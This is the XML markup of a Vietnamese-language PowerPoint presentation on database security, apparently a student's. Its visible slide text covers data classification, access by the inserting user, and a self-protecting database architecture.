              <a:t>công khai, phân loại </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được ủy quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>riêng tư. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">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en-US" sz="32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3200" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bởi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>người dùng đã </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>chèn nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>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xmlns="" id="{F5ABBAA8-FB6F-21CB-FF8C-BFDA5DC207BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8991600" y="3367766"/>
            <a:ext cx="0" cy="5509534"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{BDE420D2-84A0-BF05-6C36-16EDE3AB18D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8643960" y="9066756"/>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8</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/23</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xmlns=""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xmlns=""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xmlns="" id="{57633644-05AE-F758-5715-8FCC2B0243B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2680628"/>
            <a:ext cx="16802100" cy="7442430"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns="" id="{ED1BA458-8772-2DBE-E547-07AED6D4D06E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="71151"/>
              <a:ext cx="1950879" cy="334605"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="vi-VN" sz="3200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>2.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="32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a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Malgun Gothic" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AAC0BB1E-3517-3A12-40A8-E5521D4A8767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11049001" y="2929505"/>
            <a:ext cx="5878168" cy="6388949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{01B4FE3E-1914-17C0-D497-BA9A4DD9AD12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3611170"/>
            <a:ext cx="8877297" cy="3200876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="32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lgn="just">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C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ho phép các chính sách này chặn mọi nỗ lực thỏa hiệp trạng thái của cơ sở dữ liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>oặc thay đổi cấu hình của nó theo với những gì đã được chủ sở hữu hệ thống thiết lập </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ban đầu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F7CE1E80-53DB-2DC7-4FA4-36EB9B723619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11189976" y="9474896"/>
            <a:ext cx="5737193" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kiến trúc của cơ sở dữ liệu tự bảo vệ [11]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7D23794C-577C-A672-C992-32CB18122B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7609721" y="9705728"/>
            <a:ext cx="500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b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">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77366893"/>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1567</TotalTime>
  <Words>2219</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>163</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The Serif Hand Light</vt:lpstr>
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Cabin Medium</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Crimson Pro</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Malgun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dc:creator>CHÂU CÔNG THOẠI</dc:creator>
  <cp:lastModifiedBy>Student</cp:lastModifiedBy>
  <cp:revision>57</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-10T11:22:44Z</dcterms:modified>
  <dc:identifier>DAF9M7sjAYk</dc:identifier>
</cp:coreProperties>
</file>